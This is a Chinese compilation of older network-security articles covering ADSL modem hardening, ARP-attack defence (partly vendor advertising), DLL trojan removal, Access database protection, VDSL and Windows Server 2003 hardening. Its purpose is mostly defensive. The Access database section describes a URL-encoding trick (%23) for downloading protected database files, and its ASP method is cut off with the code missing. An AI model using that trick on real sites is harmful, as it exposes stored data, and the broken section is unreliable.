我的ADSL“猫”受到了攻击,为此我让小猫好好地修炼了一番“内功”,安全“功力”大长。下面给大家介绍一下“修炼秘技”。
最近我的ADSL Modem经常出现问题,有时开机能够正常工作,但大部分时间连网页都打不开,过一会儿重启ADSL Modem又正常了。开始还以为是ISP出问题了,打电话询问,被告知局端一切正常,可能是我的ADSL Modem受到了来自因特网的攻击。趁着周末有时间,我让ADSL Modem好好地修炼了一番“内功”,安全“功力”大长。下面笔者就给大家介绍一下“修炼秘技”。
我被攻击了
1.天网防火墙不停报警
我的接入方式为PPPoE,ADSL Modem开启路由方式,使用内置拨号软件自动拨号;开启DHCP服务,内网的机器从DHCP服务器自动获取IP。ADSL Modem使用的IP为公网IP,系统安装有天网防火墙个人版。
近段时间来,经常在ADSL Modem刚开机时不能上网,好不烦人。开始还以为是域名服务器有问题,但换一个域名服务器还是同样的现象。出现故障时,连配置软件也不能连接到ADSL Modem,Ping ADSL Modem也没有反应。怀疑是ADSL Modem出了问题,赶紧借来一个换上,参数配置跟以前的那个一样。唉,还是同样的故障现象,看样子不是它的“错”了。不会是ISP出了问题吧,打电话去一问,说是我受到了攻击。
难怪这些天来,我发现每次一开机,天网防火墙就开始报警,某某IP在不停地扫描我的端口(图1),开始我没注意,但后来越来越频繁,几乎每秒钟都有来自外网的IP试图连接到我机器上的某个端口的报警,居然都被天网拒绝了,但是频繁报警始终让人烦啊。
图一
2.安全措施不够导致被攻击
后来多方查找资料得知,发生上述故障现象的主要原因是ADSL Modem通过路由方式拨号上网后,ADSL Modem获得了公网的合法IP地址,互联网上的任何人都可以通过该IP地址来访问我的ADSL Modem。这样一些网络恶意攻击者或病毒(如震荡波病毒)就可以有针对性地进行扫描、探测,然后进行攻击,耗尽ADSL Modem资源,从而导致ADSL Modem工作异常。
ADSL Modem厂商为了让用户在全速下达到最理想的使用效果,在设备中采用的是默认最低的安全级别,而用户在购买回来后又没有对安全性方面进行进一步的设置。还有就是用户网络安全意识不足,在配置路由共享方式时没有采取任何安全防范措施(如更改Root密码,更改或限制Web/Telnet的管理端口等),从而使ADSL Modem毫无保护的直接暴露在一些怀有恶意的攻击者面前。
在这种情况下,如果ADSL Modem中某一个开放的端口存在漏洞且被不法攻击者发现,极有可能被利用来进行远程攻击。假如攻击者取得了ADSL Modem的管理员密码,他就可以远程登录到ADSL Modem上,通过NAT表得知内网机器的IP地址,把这个内网机器映射到因特网上,再使用其他的攻击工具给我种植一个“后门”,那我岂不是惨了。而且攻击者在获得管理员的权限后还可以把一个坏的固件程序刷写到ADSL Modem的Flash中,这样我的ADSL Modem岂不彻底报废了。呜呜,不敢想像。
注意:一般采用PPPoE /PPPoA /1483 固定IP+NAT /1577 +NAT方式接入的用户都有可能受到攻击。采用路由共享方式下的用户更容易受到攻击。
秘技一:“加固”ADSL Modem
1.更改Root用户的密码
ADSL Modem出厂时都设置了默认的登录用户名和密码。一般同一型号产品的默认用户名与密码是相同的。我们大多数人在安装好ADSL Modem后从未对默认的用户名与密码进行修改,这就留下了很大的安全隐患。修改默认Root用户名和密码的方法是:在浏览器地址栏中键入ADSL Modem的地址(一般为192.168.1.1),输入正确的用户名与密码,进入ADSL Modem的配置页面后,点击“管理”标签,在“用户设置”处点击Root用户旁的修改符号(如图2),然后再键入原来的密码和新密码,点击“提交”按钮更改设置。当然,首先必须将用于配置的电脑网卡IP地址改为与ADSL Modem的地址位于同一网段。
图二
笔者发现,有些型号的ADSL Modem,在正确更改完用户名和密码后,重新又恢复成默认的密码了,如果是这种情况,我们可用Telnet登录ADSL Modem,然后在$提示符下用Passwd命令修改Root用户的口令,再用commit命令提交你的更改。用这种方法也能够成功地修改用户名和密码。
2.更改Web/Telnet管理端口
设置了复杂的密码后也并不能完全保证ADSL Modem不受攻击。一般的ADSL Modem都可通过Web/Telnet方式来进行本地或远程管理,许多恶意的攻击者都是指定这几个默认的端口,通过扫描工具对某个IP地址段进行扫描再确定攻击目标。而我们的ADSL Modem开放的80、21和23等端口则是首当其冲的扫描重点。通过修改服务端口,可以避开大部分的扫描工具的试探。进入ADSL Modem的配置页面,点击“管理”标签,在“端口设置”中更改HTTP、Telnet和FTP端口。如我们把HTTP端口修改为8080,Telnet端口修改为8023(图3),以后通过Web方式访问时要用http://192.168.1.1:8080,而通过Telnet方式访问时要用Telnet 192.168.1.1:8023的方法。
图三
3.映射不存在的端口
开启路由功能的ADSL Modem都是通过NAT映射方式来实现的,NAT映射可以把来自因特网上对ADSL Modem某个端口的连接转移到内网中某个IP地址指定的端口上。病毒或恶意攻击者一般都是针对ADSL Modem的几个典型端口(如135、139、445、3127等)进行攻击,我们可以尝试把这些端口的攻击全部转移到内网中一个实际不存在的IP上,从而减少因要处理大量连接而给ADSL Modem带来的负担。在一般的ADSL Modem中,我们可以通过RDR规则和BIMAP规则来把端口映射到不存在的IP上。
1)使用RDR规则映射
如何使用RDR将Web/Telnet/FTP/TFTP等端口映射到一个不存在的IP上呢?进入ADSL Modem的配置页面,点击“服务”标签,在“NAT设置”中选择“NAT Rule Entry”,然后点击“添加”按钮,添加RDR规则。以Web端口为例,我们把它映射到一个不存在的IP:192.168.1.100上(图4),选择Rule Flavor为RDR,填入Rule ID,在本地IP地址的开始和结束分别填入192.168.1.100,在目标端口的起始值/终止值和本地端口中分别选择HTTP(80),其他的选项都选择默认值即可。Telnet/FTP/TFTP端口可参照此设置。
图四
2)使用BIMAP规则映射
使用BIMAP透明规则做所有的端口映射,将它们映射到一个不存在的IP。进入ADSL Modem的配置页面后,点击“服务”标签,在“NAT设置”中选择“NAT Rule Entry”,然后点击“添加”按钮,添加BIMAP规则。例如,我们把BIAMP规则映射到一个不存在的IP:192.168.1.200上。选择Rule Flavor为BIAMP,填入Rule ID,在本地IP地址的开始和结束分别填入192.168.1.200即可。
通过这样的设置,针对ADSL Modem的一般服务端口(或所有端口)进行的攻击,就被全部转移到内网中一个实际不存在的IP地址192.168.100(或200)上了。
4.升级固件
因为有些ADSL Modem在市场上投入的时间较早,原来采用的软件版本较低,在安全方面有一定的缺陷。现在有很多厂商在各自的主页上都有最新的固件程序提供下载,针对此类问题进行了修改,我们可通过升级ADSL Modem的固件来解决。具体的方法在厂商官方网站上都有介绍,笔者这里就不再详述了。
秘技二:开启防火墙功能
以上的操作都要更改ADSL Modem的设置,有时可能会对当前的设置产生一定的影响,而且对许多不熟悉NAT设置的用户来说,在操作方面可能存在一定的难度。
下面笔者给大家介绍一种方法,无须更改ADSL Modem原有的设置就可防止再受到攻击。现在的ADSL Modem都带有防火墙功能,但默认的状态一般是关闭的,我们只要开启了防火墙功能就行了。一般防火墙功能是通过IP过滤来实现的,具体怎样建立IP过滤规则的,鉴于篇幅比较长,这里不详细讲述,只给大家介绍两种简单的方法。如果大家的ADSL Modem是采用的Globespan技术方案,请继续往下看。
1.使用防火墙补丁
在TP-Link网站上有一个关于TD-8800 ADSL Modem的防火墙补丁下载,笔者发现TD-8800是采用Globespan技术方案,这个补丁完全可以使用在Globespan芯片的ADSL Modem上。笔者在自己的ADSL Modem上试过,一切正常(当然是非TP-Link的产品)。其实它就是在ADSL Modem的IP过滤设置中开启了几条过滤规则,免去了我们手工添加的麻烦。
补丁的使用非常简单,只要在地址栏中填入ADSL Modem的IP地址,输入用户名和密码,然后点击“执行”按钮就可以了(图5)。
图5
2.使用用户配置文件
实达的网站上有一个专门针对网络攻击的用户配置文件下载(下载地址为:http://www.star-net.com.cn/aspsky/up file/sf_20042249929.rar),也只开启ADSL Modem的IP过滤功能,这并不影响用户原有的配置。不过这个扩展名为.GLBEHR的用户配置文件要配合实达ADSL Modem的配置程序来使用。运行ADSL 配置程序,指定ADSL Modem的IP,点击“下一步”,选择“用配置文件配置”,然后再点击“下一步”,指定文件.GLBEHR文件的路径,点击“完成”即可。这样就完成了配置,开启了ADSL Modem的防火墙功能,我们可以登录到Web中看到如图6所示的页面。图中状态灯为绿色的表示规则生效。利用这些规则我们可以有效地禁止来自WAN口上的非法流量。
图6
总结
以上的两种方法都只是开启了ADSL Modem的IP过滤功能及对应的规则,不影响用户原有的配置,建议一般用户采用。而更改端口等设置对熟悉ADSL Modem配置的用户来说具有更大的灵活性。
如果我们的ADSL Modem在开机时就因为受到攻击而造成不能登录的话,则可先拔下WAN口上的电话线再开机,把ADSL Modem设置好后再插上,重新启动就行了。
推荐:彻底摆脱ARP困扰的终极设备解决方案
ARP病毒导致的频繁掉线,业已成为网吧业主最头疼的问题,ARP也一跃成为网络圈里最耳熟能详的名词之一。一时间各网络厂商针对ARP病毒的解决方案纷纷出炉,民间高手也各显其能。
硬件路由厂商最先出招,提供的解决方案大致分为三类,一类是“ARP免疫型”,从NAT底层协议出发,使用特定的NAT转发机制,仅PC机端需要对路由器或软路由的LAN口MAC进行MAC-IP绑定,对付ARP病毒的方法简单说来就是“你说的我听不懂”。另一类是“双向绑定型”,路由器、PC机端,都需要把对方的MAC-IP进行双向绑定,简单说来就是“你说的我不听”。还有一类是“内网广播型”,在内网中发送比ARP攻击频率更高的正确ARP信息,简单说来就是“我声大所以听我的”。
软件厂商也不甘落后,相继推出了ARP保护神,ARP卫士,ARP嗅探器,ARP防火墙,彩影网盾等等纯软件的解决方案。
但是在网吧实际使用环境中,使用效果并不尽如人意。第二代ARP病毒可以随心所欲的更改PC机的ARP缓存,绑定也无效,现有解决方案的弊端不断暴露出来。硬件产品无法解决PC端的ARP病毒攻击问题,既无法阻止ARP发作,也无法定位攻击源。而软件产品由于缺乏对网络硬件以及网络底层协议的了解,完全是瞎猫在找死耗子。
难道对ARP病毒真的就束手无策了吗?不。巡路“免疫墙”是彻底摆脱ARP困扰的终极解决方案。
二、巡路的解决之道
首先澄清一点,ARP不是病毒,而是一种“协议性攻击行为”,只所以称之为病毒,是因为目前ARP攻击工具的传播方式与发作现象已经愈来愈接近病毒。ARP(地址解释协议)是网络通信协议中的不可缺少的关键协议,它是负责将IP地址转换为对应MAC地址的协议。ARP的存在给了好事者可趁之机,但如果缺少了ARP协议,网络设备之间将无法进行通讯,这是为什么对ARP投鼠忌器的主要原因。
ARP病毒可分为两种,一种是ARP欺骗,一种是ARP攻击。ARP欺骗最先是黑客们偷盗网络账号使用的,后来被广泛用于类似网路岗、网络执法官之类的网络管理工具,被骗主机会将数据发送给伪装的主机,从而达到截获数据的目的。而ARP攻击纯粹是以破坏网络通讯为主要目的,发送虚假的ARP请求包或应答包,使得网络内所有主机都失去了有序的组织和联系,所以ARP攻击成为网吧经营活动中相互打击一种重要方式。
ARP病毒的传播,必须有“肉鸡”,就是容易被感染的宿主机,通过得到宿主机的控制权来发送ARP欺骗、虚假的ARP请求包和应答包。由于没有明显的特征字以及ARP在网络通讯中的重要地位,防毒墙和防火墙应对ARP病毒也束手无策。所以从源头上堵住问题数据的流出,同时放行合法的ARP数据包,才是彻底摆脱ARP困扰的终极解决方案。
巡路“免疫墙”应运而生,安装在PC机上的免疫墙终端能够完成对MAC-IP的看守式绑定,彻底根除ARP病毒影响,即使本机中毒(删除本机的静态绑定列表),也不能对自身和网络造成影响。安装在服务器上的巡路监控端提供了网络“可视化”的操作平台,不仅可以做到“攻击定位”,更可以将ARP病毒限制在单机范围内,完全避免其对网络的伤害。此外,网络管理员可以制定策略,对攻击行为进行定义和制定“反击”措施,以示惩戒。同时配合具备“ARP先天免疫”功能的欣向路由器,应对内外网的ARP病毒攻击,形成一个三位一体的完整解决方案。
三、巡路免疫墙
巡路免疫墙由免疫墙终端和监控端两部分组成,免疫墙终端安装在内网主机上,监控端安装在服务器上。
免疫墙工作在网卡之上,终端开机后自动运行,没有操作界面,完全服从于“监控端”控制,负责和监控端通信,如接收控制指令。监控端作为整个网络的视窗,可以监测网络中的每个客户端的某些网络行为,如连接速率,建立的连接数目,ARP欺骗,IP欺骗,分片攻击等等。(如图)
巡路免疫墙“授权版”监控端运行界面
巡路免疫墙具备的功能包括:
1.恶意攻击识别:对数据进行精确分析,将“网络攻击”进行拦截,并举报其违规行为,目前支持IP地址欺骗和所有的ARP欺骗,以及洪水包攻击。
2.ARP看守式绑定:彻底根除ARP病毒影响,即使本机中毒(删除本机的静态绑定列表),也不能对自身和网络造成影响——ARP问题终极解决方案。
3.超大流量发现:根据定义,当某台主机流量过大时,系统将进行报警(并反制)。
4.蠕虫病毒发现:当某台主机发起过多连接时,系统将进行报警(并反制)
5.内外网分开统计:针对内网外网数据进行分开统计,避免内网传输被误认为是大流量攻击。
6.流量控制:可以分开控制内网主机的上下传流量。
7.分组权限管理:针对不同的分组可以对内网主机进行分开管理,包括权限和报警条件。
8.采用私有通讯协议加密传输,安全性极高。
9.在保证即时性的同时,对危险行为进行现场保护,日志记录,保证有据可查。
10.客户端及监控端自动升级:最新软件可以迅速布置到所有主机。
四、巡路的扩展
巡路的功能不仅仅局限于ARP问题的解决,针对其他引发网吧断线的“协议性攻击行为”,如UDP攻击,IP分片攻击,SYN攻击、假冒IP欺骗,假冒MAC欺骗,洪水包攻击等等,巡路也提供的很好的解决方案。
所以说,“毒墙、火墙、免疫墙,一个也不能少”。
动画大小: 6860 K
动画语言: 简体中文
动画类型: 投稿动画
运行环境: Win9x/NT/2000/XP/2003
添加时间: 2007-9-19 20:21:40
软件评级: ★★★
授权方式: 投稿收录
动画作者: 小馒头
软件添加: 水土不服
动画介绍:
手动追杀木马!
刚才不信被一个程序绑了后门..中了木马..看样子是上兴.今天就给大家讲讲怎么手动
去查杀木马
******************************************************************************
本动画的MD5值为:
88c90eab62d8004562266ab2d40653a4 1.exe
下载连接
网络接入技术介绍 关于VDSL线路接入技术
一、概述
简单地说,VDSL就是ADSL的快速版本。使用VDSL,短距离内的最大下传速率可达55Mbps,上传速率可达2.3Mbps(将来可达19.2Mbps,甚至更高)。上传和下传数据信道都可在现有的POTS或ISDN服务上被频分,使VDSL成为高速、低价网络的佳选。将来的升级可能需要转向回馈抑制(Echo Cancellation)或其它技术以管理线路。象ADSL一样,VDSL将主要用于实时视频传输和高速数据访问。
距离(英尺) 速率(Mbps)
>1000 51.84
>1000 to <= 3000 25.82
>3000 to <= 4500 12.96
二、原理
VDSL的体系结构就象高速的ADSL。VDSL复用上传和下传管道以获取更高的传输速率,它也使用了内置纠错功能以弥补噪声等干扰。VDSL适于短距传输。
目前,建议使用的VDSL编码有四种:CAP、DMT(此二种见ADSL)、DWMT和SLC。DWMT(Discrete Wavelet Multitone)是使用单一载体的子波变换的多重载体调制系统。SLC(Simple Line Code)是一种基带信令版本,它过滤基带并在收发器处还原。
VDSL用频分复用(FDM)分隔信道。以后VDSL将支持对称数据速率,这可能需要转向回馈抑制。通常下传信道配置在上传信道之上,但DAVIC的规范则反之以使VDSL可用于同轴电缆。
转发错误控制是VDSL的另一特性,象ADSL(T1.413)一样,它用一种Reed Solomon编码和interleaving对线噪纠错。
三、目前情况
VDSL技术仍处于初期,长距应用仍需测试。其许多线路特性的数据仅是推测,这可能会损害其整体性能。其端点设备的普及也需要时间。
ADSL具有较好的产品基础,将VDSL与ADSL合用是个好的策略,将ADSL用于远距而VDSL用于近距,它们可以为未来的数据需要提供更好的服务。
数据库安全 关于Access数据库4种安全方式
一、密码式
给数据库起一个随机复杂的名称,避免被猜到被下载,这种方式在以前很流行,因为大家都对自己的代码很有自信。但随着错误提示对数据库地址的泄露导致数据库被非法下载,这种方式也就越来越少人用了。
二、"#"式
在数据库名称里加上#号,从URL上请求时#是请求地址和请求参数的一个分隔字符,如果知道了数据库名,直接请求的话,如:http://www.xx.com/access#.mdb,WEB服务器会认为请求的是access而不是access#.mdb,所以会提示找不到文件,但是很遗憾,URL中对于这些特殊的字符都会有一个特殊的表示方式,#的特殊表示就是%23,如http://www.xx.com/access%23.mdb,那么access#.mdb将会被下载。还有如果用FlashGet之类的下载工具也可以直接下载。
三、ASP式
这种作法是比较专业但也是很安全的也是现在比较流行的作法,但是现在许多的人只是作了一半,只是将数据名改成ASP而以,这样的话直接用FlashGet之类的下载工具一样可以将数据库下载,这种方式的正确作法有两步:
第一步:在数据库内创建一个字段,名称随意,类型是OLE对象,内容设置为单字节型的"
这段代码运行完之后将会在数据库内生成一个nodownload表,表内字段是notdown。如果数据库内已有同名的数据表存在请将代码内的nodownload改成自己想要的数据表名即可。
四、asa式
这种方式的真谛是利用IIS对ASA文件的保护,从而使得数据库文件不能从URL上直接请求下载,但是这种方式被误解成只要将文件后缀改成ASA就可以了。要知道IIS只是对global.asa这个文件名有请求保护,所以这种方式只能将数据库名设置为global.asa,而且要注意的是,设置成global.asa之后最好不要将其放在主机或虚拟目录的根目录里,不然会被IIS当然正常的global.asa文件进行尝试运行的。
推荐:黑客教你如何利用Excel剿灭DLL木马
第一步:查找被感染的进程
近日开机上网一段时间后就觉得网速特别的慢,于是便运行“netstat -a -n -o”查看开放的端口和连接,其中进程PID为580发起的连接极为可疑:状态为ESTABLISHED,表示两台机器正在通信(见图1)。通过任务管理器可以知道这个进程为lsass.exe,根据进程的解释,lsass.exe是用于微软Windows系统的安全机制,它用于本地安全和登陆策略,显然这个进程是不需要开放端口和外部连接的,据此判断该进程极可能插入DLL木马。如果牧马者当前没有进行连接,还可以通过端口状态判断是否中招,如TIME_WAIT的意思是结束了这次连接,说明端口曾经有过访问,但访问结束了,表明已经有黑客入侵过本机。LISTENING表示处于侦听状态,等待连接,但还没有被连接,不过只有TCP协议的服务端口才能处于LISTENING状态。
小提示:判断是否中招的前提是要找出被感染的进程,按被插入进程的类别分,DLL木马大致可以分为:
1.插入常用进程,如Notepad.exe、Iexplorer.exe(此类木马的判断很简单,开机后不启动任何程序,打开任务管理器如果发现上述进程,那就可以判断中招了)。
2.插入系统进程,如Explorer.exe、lsass.exe(由于每台电脑开机后都有上述的进程,具体可以通过查看端口和进程本身特性加以判断,比如本机的lsass.exe、winlogon.exe、explorer.exe就不会开放端口连接)。
3.对于插入本身就开放端口进程如alg.exe、svchost.exe,需要通过连接状况、连接IP、调用DLL综合加以判断。
第二步:追查木马真凶
知道被插入DLL木马的进程,我们就可以通过比较进程调用的DLL模块来甑别。
1.到其它正常电脑上启动命令提示符运行“tasklist /m /fo list >G:\dll1.txt”,将当前进程加载所有DLL文件以列表形式输出,然后打开dll.txt并复制lsass.exe加载的DLL文件列表(见图2)。
2..打开Excel,将正常电脑和中招电脑lsass.exe加载的DLL文件复制到A、B列,由于Excel有序号,通过序号就可以轻易发现两个lsass.exe加载的DLL文件数量不同(64和68)。现在将B列字体设置为红色,剪切B列内容并粘贴到A列,单击Excel的“数据/排序”,将数据重新排序后,木马文件就在连续红色但和上格不相同的DLL文件中,分别是mswsock.dll、PSAPI.DLL、wshtcpip.dll、share.dll(见图3)。
小提示:
如果无法确定哪个进程被插入木马,可以先输出所有DLL文件,然后在Excel中排序和正常状态DLL文件比较,依次找出新增的DLL文件一一排查。
第三步:删除木马文件
从上可以知道DLL木马就在上述多出的4个文件中,现在通过搜索功能找到这些文件(DLL文件大多在系统目录,搜索范围可限制在此),并通过查看属性最终找到真凶为c:\windows\system32\share.dll。现在进入安全模式将share.dll删除,然后根据它的创建时间、大小找到木马的同伙并删除。一般微软系统DLL文件都有版本标签,而且文件日期大多是一样的,可以通过这些属性判断。
小提示:对于插入notepad、IE、explorer.exe等进程的dll木马,可以将进程终止后直接删除dll木马。
第四步:做好备份,防患于未然
相对来说,本例被插入木马的系统进程比较容易判断,但是对插入系统本身就开放端口的进程如svchost.exe,判断起来就比较困难。因此我们平时要用Tasklist命令做好常见系统进程DLL文件备份,这样就可以在怀疑自己中招时,重启并关闭任何无关程序,然后通过Excel排序快速找到木马真凶!
注意:系统有多个svchost.exe进程,但是它们进程pid是不同的,需要分开备份。
推荐:让您轻松无忧 防治arp攻击
防治ARP攻击,哪种方式让您轻松无忧?由于最近ARP欺骗/攻击反反复复,而市场上的各种防制方式让广大读者应接不暇,如何才能有效防制ARP,是今天我们所有技术人员都要应对的问题。最近一些方案,从短期看来似乎有效,实际上对于真正的ARP攻击发挥不了作用,也降低局域网工作效率。Qno的技术服务人员接到很多用户反应说有些ARP防制方法很容易操作和实施,但经过实际深入了解后,发现长期效果都不大。
对于ARP攻击防制,Qno技术服务人员的建议,最好的方法是先踏踏实实把基本防制工作做好,才是根本解决的方法。由于市场上的解决方式众多,我们无法一一加以说明优劣,因此本文解释了ARP攻击防制的基本思想。我们认为读者如果能了解这个基本思想,就能自行判断何种防制方式有效,也能了解为何双向绑定是一个较全面又持久的解决方式。
一、不坚定的ARP协议
一般计算机中的原始的ARP协议,很像一个思想不坚定,容易被其它人影响的人,ARP欺骗/攻击就是利用这个特性,误导计算机作出错误的行为。ARP攻击的原理,互联网上很容易找到,这里不再覆述。原始的ARP协议运作,会附在局域网接收的广播包或是ARP询问包,无条件覆盖本机缓存中的ARP/MAC对照表。这个特性好比一个意志不坚定的人,听了每一个人和他说话都信以为真,并立刻以最新听到的信息作决定。
就像一个没有计划的快递员,想要送信给“张三”,只在马路上问“张三住那儿?”,并投递给最近和他说“我就是!”或“张三住那间!”,来决定如何投递一样。在一个人人诚实的地方,快递员的工作还是能切实地进行;但若是旁人看快递物品值钱,想要欺骗取得的话,快递员这种工作方式就会带来混乱了。
我们再回来看ARP攻击和这个意志不坚定快递员的关系。常见ARP攻击对象有两种,一是网络网关,也就是路由器,二是局域网上的计算机,也就是一般用户。攻击网络网关就好比发送错误的地址信息给快递员,让快递员整个工作大乱,所有信件无法正常送达;而攻击一般计算机就是直接和一般人谎称自己就是快递员,让一般用户把需要传送物品传送给发动攻击的计算机。
由于一般的计算机及路由器的ARP协议的意志都不坚定,因此只要有恶意计算机在局域网持续发出错误的ARP讯息,就会让计算机及路由器信以为真,作出错误的传送网络包动作。一般的ARP就是以这样的方式,造成网络运作不正常,达到盗取用户密码或破坏网络运作的目的。针对ARP攻击的防制,常见的方法,可以分为以下三种作法:
1、利用ARP echo传送正确的ARP讯息:通过频繁地提醒正确的ARP对照表,来达到防制的效果。
2、利用绑定方式,固定ARP对照表不受外来影响:通过固定正确的ARP对照表,来达到防制的效果。
3、舍弃ARP协议,采用其它寻址协议:不采用ARP作为传送的机制,而另行使用其它协议例如PPPoE方式传送。
以上三种方法中,前两种方法较为常见,第三种方法由于变动较大,适用于技术能力较佳的应用。下面针对前两种方法加以说明。
PK 赛之“ARP echo”
ARP echo是最早开发出来的ARP攻击解决方案,但随着ARP攻击的发展,渐渐失去它的效果。现在,这个方法不但面对攻击没有防制效果,还会降低局域网运作的效能,但是很多用户仍然以这个方法来进行防制。以前面介绍的思想不坚定的快递员的例子来说,ARP echo的作法,等于是时时用电话提醒快递员正确的发送对象及地址,减低他被邻近的各种信息干扰的情况。
但是这种作法,明显有几个问题:第一,即使时时提醒,但由于快递员意志不坚定,仍会有部份的信件因为要发出时刚好收到错误的信息,以错误的方式送出去;这种情况如果是错误的信息频率特高,例如有一个人时时在快递员身边连续提供信息,即使打电话提醒也立刻被覆盖,效果就不好;第二,由于必须时时提醒,而且为了保证提醒的效果好,还要加大提醒的间隔时间,以防止被覆盖,就好比快递员一直忙于接听总部打来的电话,根本就没有时间可以发送信件,耽误了正事;第三,还要专门指派一位人时时打电话给快递员提醒,等于要多派一个人手负责,而且持续地提醒,这个人的工作也很繁重。
以ARP echo方式对应ARP攻击,也会发生相似的情况。第一,面对高频率的新式ARP攻击,ARP echo发挥不了效果,掉线断网的情况仍旧会发生。ARP echo的方式防制的对早期以盗宝为目的的攻击软件有效果,但碰到最近以攻击为手段的攻击软件则公认是没有效果的。第二,ARP echo手段必须在局域网上持续发出广播网络包,占用局域网带宽,使得局域网工作的能力降低,整个局域网的计算机及交换机时时都在处理ARP echo广播包,还没受到攻击局域网就开始卡了。第三,必须在局域网有一台负责负责发ARP echo广播包的设备,不管是路由器、服务器或是计算机,由于发包是以一秒数以百计的方式来发送,对该设备都是很大的负担。
图一:ARP攻击防制 方法之“ARP echo”图示说明常见的ARP echo处理手法有两种,一种是由路由器持续发送,另一则是在计算机或服务器安装软件发送。路由器持续发送的缺点是路由器原本的工作就很忙,因此无法发送高频率的广播包,被覆盖掉的机会很大,因此面对新型的ARP攻击防制效果小。因此,有些解决方法,就是拿ARP攻击的软件来用,只是持续发出正确的网关、服务器对照表,安装在服务器或是计算机上,由于服务器或是计算机运算能力较强,可以同一时间内发出更多广播包,效果较大,但是这种作法一则大幅影响局域网工作,因为整个局域网都被广播包占据,另则攻击软件通常会设定更高频率的广播包,误导局域网计算机,效果仍然有限。
此外,ARP echo一般是发送网关及私服的对照信息,对于防止局域网计算机被骗有效果,对于路由器没有效果,仍需作绑定的动作才可。
PK赛之“ARP绑定”
ARP echo的作法是不断提醒计算机正确的ARP对照表,ARP绑定则是针对ARP协议“思想不坚定“的基本问题来加以解决。ARP绑定的作法,等于是从基本上给这个快递员培训,让他把正确的人名及地址记下来,再也不受其它人的信息干扰。由于快递员脑中记住了这个对照表,因此完全不会受到有心人士的干扰,能有效地完成工作。在这种情况下,无论如何都可以防止因受到攻击而掉线的情况发生。
但是ARP绑定并不是万灵药,还需要作的好才有完全的效果。第一,即使这个快递员思想正确,不受影响,但是攻击者的网络包还是会小幅影响局域网部份运作,网管必须通过网络监控或扫瞄的方法,找出攻击者加以去除;第二,必须作双向绑定才有完全的效果,只作路由器端绑定效果有限,一般计算机仍会被欺骗,而发生掉包或掉线的情况。
双向绑定的解决方法,最为网管不喜欢的就是必须一台一台加以绑定,增加工作量。但是从以上的说明可知道,只有双向绑定才能有效果地解决ARP攻击的问题,而不会发生防制效果不佳、局域网效率受影响、影响路由器效能或影响服务器效能的缺点。也就是说双向绑定是个硬工夫,可以较全面性地解决现在及未来ARP攻击的问题,网管为了一时的省事,而采取片面的ARP echo解决方式,未来还是要回来解决这个问题。
图二:ARP攻击防制 方法之侠诺“ARP双向绑定”图示说明另外,对于有自动通过局域网安装软件的网络,例如网吧的收费系统、无盘系统,都可以透过自动的批次档,自动在开机时完成绑定的工作,网管只要撰写一个统一的批次文件程序即可,不必一一配置。
二、现阶段较佳解决方案——双向绑定
以上以思想不坚定的快递员情况,说明了常见的ARP攻击防制方法。ARP攻击利用的就是ARP协议的意志不坚,只有以培训的方式让ARP协议的意志坚定,明白正确的工作方法,才能从根本解决问题。只是依赖频繁的提醒快递员正确的作事方法,但是没有能从快递员意志不坚的特点着手,就好像只管不教,最终大家都很累,但是效果仍有限。
面对这种新兴攻击,取巧用省事的方式准备,最后的结果可能是费事又不管用,必须重新来过。ARP双向绑定虽然对网管带来一定的工作量,但是其效果确是从根本上有效,而且网管也可参考自动批次档的作法,加快配置自动化的进行,更有效地对抗ARP攻击。
检测计算机真实性能 微软官方评估工具
Windows Vista Hardware Assessment是一个使用WMI(Windows Management Instrumentation)发现网络中计算机并产生详细清单的工具.通过得到的数据,该工具将评估、报告这些计算机是否可以运行Windows Vista,并发现计算机设备的驱动程序,提供硬件升级建议.显然,这个工具很适合管理着大量计算机的企业网络管理员,如果要升级到Vista,这款工具不可缺少.
Windows Vista Hardware Assessment不需要被评估和列表的计算机上安装代理程序,可以快速、简单断定网络中计算机是否适合安装Vista.Windows Vista Hardware Assessment可以提供有关硬件和设备在Windows Vista下兼容性的详细分析,以及检查兼容性数据更新.
此外,Windows Vista Hardware Assessment还可让用户了解哪些硬件设备在Windows Vista安装光盘中已提供了设备驱动程序,哪些驱动程序未提供但可从Windows Update下载等.
Server2003 防木马权限设置IIS服务器安全配置
参考了网络上很多关于WIN2003的安全设置以及自己动手做了一些实践,综合了这些安全设置文章整理而成,希望对大家有所帮助,另外里面有不足之处还请大家多多指点,然后给补上,谢谢!
一、系统的安装
1、按照Windows2003安装光盘的提示安装,默认情况下2003没有把IIS6.0安装在系统里面。
2、IIS6.0的安装
开始菜单—>控制面板—>添加或删除程序—>添加/删除Windows组件
应用程序 ———ASP.NET(可选)
|——启用网络 COM+ 访问(必选)
|——Internet 信息服务(IIS)———Internet 信息服务管理器(必选)
|——公用文件(必选)
|——万维网服务———Active Server pages(必选)
|——Internet 数据连接器(可选)
|——WebDAV 发布(可选)
|——万维网服务(必选)
|——在服务器端的包含文件(可选)
然后点击确定—>下一步安装。(具体见本文附件1)
3、系统补丁的更新
点击开始菜单—>所有程序—>Windows Update
按照提示进行补丁的安装。
4、备份系统
用GHOST备份系统。
5、安装常用的软件
例如:杀毒软件、解压缩软件等;安装完毕后,配置杀毒软件,扫描系统漏洞,安装之后用GHOST再次备份系统。
6、先关闭不需要的端口 开启防火墙 导入IPSEC策略
在”网络连接”里,把不需要的协议和服务都删掉,这里只安装了基本的Internet协议(TCP/IP),由于要控制带宽流量服务,额外安装了Qos数据包计划程序。在高级tcp/ip设置里--"NetBIOS"设置"禁用tcp/IP上的NetBIOS(S)"。在高级选项里,使用"Internet连接防火墙",这是windows 2003 自带的防火墙,在2000系统里没有的功能,虽然没什么功能,但可以屏蔽端口,这样已经基本达到了一个IPSec的功能。
修改3389远程连接端口
修改注册表.
开始--运行--regedit
依次展开 HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/
TERMINAL SERVER/WDS/RDPWD/TDS/TCP
右边键值中 PortNumber 改为你想用的端口号.注意使用十进制(例 10000 )
HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/
WINSTATIONS/RDP-TCP/
右边键值中 PortNumber 改为你想用的端口号.注意使用十进制(例 10000 )
注意:别忘了在WINDOWS2003自带的防火墙给+上10000端口
修改完毕.重新启动服务器.设置生效.
二、用户安全设置
1、禁用Guest账号
在计算机管理的用户里面把Guest账号禁用。为了保险起见,最好给Guest加一个复杂的密码。你可以打开记事本,在里面输入一串包含特殊字符、数字、字母的长字符串,然后把它作为Guest用户的密码拷进去。
2、限制不必要的用户
